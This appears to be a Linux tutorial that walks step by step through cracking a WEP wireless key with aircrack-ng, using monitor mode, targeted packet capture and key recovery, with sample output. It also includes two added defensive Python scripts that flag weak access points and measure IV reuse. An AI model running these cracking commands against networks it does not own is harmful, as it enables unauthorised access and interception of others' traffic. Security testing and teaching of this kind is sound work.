This article briefly describes the steps to crack a wireless WEP key with the aircrack-ng suite: sniff a wireless network, capture encrypted packets, and run the cracking program against the captured data in an attempt to decrypt it. WEP (Wired Equivalent Privacy) is quite easy to crack because it encrypts all traffic with a single shared key.
The basic principle is that communication between two nodes on a network is addressed by MAC address: each host normally processes only the frames destined for the MAC address of its own interface. The same principle applies to wireless networks. However, a node that puts its own network card into promiscuous (on wireless, monitor) mode will also receive frames that are not addressed to its own MAC address.
To crack the WEP key, an attacker captures packets that are not intended for their own network interface and runs a cracking program that tests candidate keys against the captured, WEP-encrypted packets. The key that decrypts the captured packets correctly is the key the wireless network uses to encrypt all of its traffic with the connected stations.
In the following sections, we’ll guide you through the aircrack-ng installation on Linux, then show you step by step instructions to crack a wireless WEP key. The guide assumes that you have a wireless network card installed and that it supports monitor mode.
In this tutorial you will learn:
- How to install aircrack-ng on major Linux distros
- How to crack a wireless WEP key using aircrack-ng
Category | Requirements, Conventions or Software Version Used |
---|---|
System | Any Linux distro |
Software | aircrack-ng |
Other | Privileged access to your Linux system as root or via the sudo command. |
Conventions | # – requires given Linux commands to be executed with root privileges either directly as a root user or by use of the sudo command; $ – requires given Linux commands to be executed as a regular non-privileged user |
Install aircrack-ng on major Linux distros
To get started, you will need the aircrack-ng software installed on your system. You can use the appropriate command below to install the program with your system’s package manager.
To install aircrack-ng on Ubuntu, Debian, and Linux Mint:
$ sudo apt install aircrack-ng
To install aircrack-ng on CentOS, Fedora, AlmaLinux, and Red Hat:
$ sudo dnf install aircrack-ng
To install aircrack-ng on Arch Linux and Manjaro:
$ sudo pacman -S aircrack-ng
Crack wireless WEP key
- First we need to identify the name of our wireless network interface. If your wireless network card is installed correctly, the `iwconfig` command will reveal the name of your wireless network interface:

  ```
  $ iwconfig
  wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm
  ```

  The output shows that in our case, the interface name is `wlan0`.
- Next, turn on monitor mode for the wireless interface.

  ```
  # airmon-ng start wlan0

  Interface       Chipset         Driver
  wlan0           rtl8180         - [phy0]
                                  (monitor mode enabled on mon0)
  ```

  The result of the command will give you the name of the new virtual interface. It tends to be `mon0`.
- Dump the results of the monitor into a terminal, so you can see them.

  ```
  # airodump-ng mon0
  ```

  You will see a table of data pertaining to wireless networks in your area. You only need information about the network you wish to crack. Look for it, and note its BSSID and the channel it is on.
- Next, you are going to log the results of a scan to a file. That capture log will be needed by aircrack-ng to run a brute force attack on the network later. To get your capture, run the same command as before, but specify your BSSID, channel, and the log location:

  ```
  # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0
  ```

  Fill in your actual information before running the command, and leave it running.
- As a last step, we crack the WEP key using the captured packets and the `aircrack-ng` command. All captured packets are now stored in the `wep-crack-01.cap` file.

  ```
  # aircrack-ng -z wep-crack-01.cap
  ```

  Your output should look something like this:

  ```
  Opening wep-crack-01.cap
  Read 450 packets.

     #  BSSID              ESSID                     Encryption

     1  00:11:95:9F:FD:F4  linuxconfig.org           WEP (210 IVs)
     2  00:17:3F:65:2E:5A  belkin54g                 None (0.0.0.0)

  Index number of target network ? 1

                                   Aircrack-ng 1.0 rc1

                     [00:00:13] Tested 485 keys (got 16690 IVs)

     KB    depth   byte(vote)
      0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
      1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
      2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
      3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
      4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

               KEY FOUND! [ 3F:F3:8E:6E:98 ]
        Decrypted correctly: 100%
  ```
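Besides the `.cap` file, `airodump-ng -w` also writes a `wep-crack-01.csv` summary of every access point and station it saw. For a defender the useful question is the reverse of step 4: which networks in range are still on WEP, or open? The script below is an added example, not code from the article or from the aircrack-ng project; it parses that CSV and flags such networks. It assumes the column layout airodump-ng uses (`BSSID, First time seen, ...`, followed by a `Station MAC` section), and the `SAMPLE_CSV` it runs on by default is constructed, with made-up addresses and ESSIDs.

```python
"""Inventory the access points in an airodump-ng CSV file and flag weak ones.

Added example for this article; it is not code from the article or from the
aircrack-ng project. Assumption: when airodump-ng is started with -w <prefix>
it writes <prefix>-01.csv beside the .cap file, with an access-point section
headed 'BSSID, First time seen, ...' followed by a 'Station MAC, ...' section.
SAMPLE_CSV below is constructed for the example; every address and ESSID in it
is made up.
"""
import csv
import io
import sys

# Constructed sample in the airodump-ng CSV layout (not a real scan).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP, , -60, 120, 210,   0.  0.  0.  0,  11, example-lab, 
00:11:22:33:44:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,  80,   0,   0.  0.  0.  0,   9, home-wifi, 
00:11:22:33:44:77, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN , , , -80,  30,   0,   0.  0.  0.  0,   6, guest1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -50, 15, 00:11:22:33:44:55, 
"""

# Privacy values that should not appear on a network you are responsible for.
WEAK = {
    "WEP": "WEP is broken; migrate the network to WPA2 or WPA3",
    "OPN": "open network, no encryption at all",
}


def parse_access_points(text):
    """Return one dict per access point from the first section of the CSV."""
    aps = []
    header = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or all(not cell.strip() for cell in row):
            continue                      # blank separator line
        if row[0] == "Station MAC":
            break                         # client section starts; APs are done
        if row[0] == "BSSID":
            header = [cell.strip() for cell in row]
            continue
        if header is not None:
            aps.append(dict(zip(header, (cell.strip() for cell in row))))
    return aps


def weak_access_points(text):
    """Return (BSSID, ESSID, Privacy, reason) for every AP with WEP or no encryption."""
    findings = []
    for ap in parse_access_points(text):
        privacy = ap.get("Privacy", "")
        for tag, reason in WEAK.items():
            if tag in privacy.split():    # Privacy can hold several tokens, e.g. 'WPA2 WPA'
                findings.append((ap["BSSID"], ap["ESSID"], privacy, reason))
    return findings


if __name__ == "__main__":
    # Usage: python3 wep_inventory.py wep-crack-01.csv   (no argument: run on the sample)
    data = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_CSV
    for bssid, essid, privacy, reason in weak_access_points(data):
        print(f"{bssid}  {essid!r:20} {privacy:6} {reason}")
```

Run it against the CSV from your own scan; anything it lists is a network to migrate or shut down, since the rest of this article shows how little effort its key protects against.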
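The `(210 IVs)` and `got 16690 IVs` figures in the output above count the initialization vectors aircrack-ng has collected. Every WEP data frame carries a 24-bit IV in the clear in front of its RC4-encrypted body, and because all stations share one key, a repeated IV means a repeated keystream; that is the weakness behind the single-key remark in the introduction. The following added example, not code from the article or from aircrack-ng, audits a capture taken on your own lab network for exactly that. It reads a classic pcap of raw 802.11 (link type 105) or radiotap (link type 127) frames, the two link types commonly found in airodump-ng captures, and reports how many protected data frames it holds, how many distinct IVs appear and how many frames reuse one. The capture it runs on by default is constructed in memory; all addresses in it are made up.

```python
"""Audit a WEP capture for initialization-vector (IV) reuse.

Added example for this article; it is not code from the article or from the
aircrack-ng project. It reads a classic pcap whose link type is raw 802.11
(105) or radiotap (127), counts the protected data frames, the distinct 24-bit
IVs and the frames that repeat an IV already seen. The capture it runs on by
default is constructed in memory below; all addresses in it are made up.
"""
import struct
import sys

LINKTYPE_IEEE802_11 = 105
LINKTYPE_RADIOTAP = 127
PCAP_MAGIC_LE = 0xA1B2C3D4


def iter_pcap_frames(data):
    """Yield (linktype, frame) for each record of a little-endian classic pcap."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC_LE:
        raise ValueError("not a little-endian classic pcap (pcapng is not handled)")
    linktype, = struct.unpack_from("<I", data, 20)
    off = 24                                  # global header is 24 bytes
    while off + 16 <= len(data):              # 16-byte per-record header
        _sec, _usec, incl_len, _orig = struct.unpack_from("<IIII", data, off)
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def wep_iv_stats(pcap_bytes):
    """Count protected data frames and IV reuse across the whole capture."""
    stats = {"frames": 0, "data_frames": 0, "protected": 0, "unprotected_data": 0,
             "unique_ivs": 0, "reused_iv_frames": 0, "key_ids": set()}
    seen = set()
    for linktype, frame in iter_pcap_frames(pcap_bytes):
        stats["frames"] += 1
        if linktype == LINKTYPE_RADIOTAP:     # strip the radiotap header (length at offset 2)
            rt_len, = struct.unpack_from("<H", frame, 2)
            frame = frame[rt_len:]
        elif linktype != LINKTYPE_IEEE802_11:
            raise ValueError("unsupported link type %d" % linktype)
        if len(frame) < 24:
            continue
        fc0, fc1 = frame[0], frame[1]
        if (fc0 >> 2) & 0x3 != 2:             # only data frames carry a WEP-encrypted body
            continue
        stats["data_frames"] += 1
        hdr = 24
        if fc1 & 0x03 == 0x03:                # ToDS and FromDS both set: a fourth address
            hdr += 6
        if fc0 & 0x80:                        # QoS data subtype: two-byte QoS control field
            hdr += 2
        if not fc1 & 0x40:                    # Protected Frame bit clear
            stats["unprotected_data"] += 1
            continue
        if len(frame) < hdr + 4:
            continue
        stats["protected"] += 1
        iv = bytes(frame[hdr:hdr + 3])        # WEP body starts with IV (3 bytes) + key-ID byte
        stats["key_ids"].add(frame[hdr + 3] >> 6)
        if iv in seen:
            stats["reused_iv_frames"] += 1    # same IV, same key: identical RC4 keystream
        else:
            seen.add(iv)
    stats["unique_ivs"] = len(seen)
    stats["key_ids"] = sorted(stats["key_ids"])
    return stats


# --- constructed sample capture (made-up addresses, dummy ciphertext) ---
BSSID, STA, DST = (bytes.fromhex(h) for h in ("001122334455", "aabbccddeeff", "ffffffffffff"))


def _data_frame(iv=b"", protected=True, qos=False):
    fc0 = 0x88 if qos else 0x08               # type data; subtype QoS data or plain data
    fc1 = 0x01 | (0x40 if protected else 0)   # ToDS, plus the Protected Frame bit
    hdr = bytes([fc0, fc1, 0, 0]) + BSSID + STA + DST + b"\x10\x00"
    if qos:
        hdr += b"\x00\x00"
    body = iv + b"\x00" + b"\xde\xad\xbe\xef" * 2 + b"\x00" * 4 if protected else b"\x00" * 12
    return hdr + body


def _beacon():
    return bytes([0x80, 0x00, 0, 0]) + DST + BSSID + BSSID + b"\x00\x00" + b"\x00" * 12


def _pcap(frames, linktype):
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, linktype)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


SAMPLE_FRAMES = [_beacon(), _data_frame(b"\x00\x00\x01"), _data_frame(b"\x00\x00\x02"),
                 _data_frame(b"\x00\x00\x03"), _data_frame(b"\x00\x00\x01"),
                 _data_frame(protected=False), _data_frame(b"\x00\x00\x04", qos=True)]
SAMPLE_PCAP = _pcap(SAMPLE_FRAMES, LINKTYPE_IEEE802_11)
# Same frames behind an 8-byte radiotap header (version 0, length 8, no fields present).
SAMPLE_PCAP_RADIOTAP = _pcap([bytes([0, 0]) + struct.pack("<HI", 8, 0) + f for f in SAMPLE_FRAMES],
                             LINKTYPE_RADIOTAP)

if __name__ == "__main__":
    # Usage: python3 wep_iv_audit.py wep-crack-01.cap   (no argument: run on the sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for k, v in wep_iv_stats(data).items():
        print(f"{k:18} {v}")
```

Run it as `python3 wep_iv_audit.py wep-crack-01.cap`. On the constructed sample it reports six data frames, five of them protected, four distinct IVs and one frame that reuses an IV; on a busy WEP network the `reused_iv_frames` figure climbs quickly, which is the measurable reason to migrate such a network rather than rely on the key staying secret.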
Closing Thoughts
In this guide, we saw how to install aircrack-ng on Linux and use the software to crack a wireless WEP key. Remember that this process should only ever be used to test your own security or for educational purposes. Using it on someone else’s network is illegal.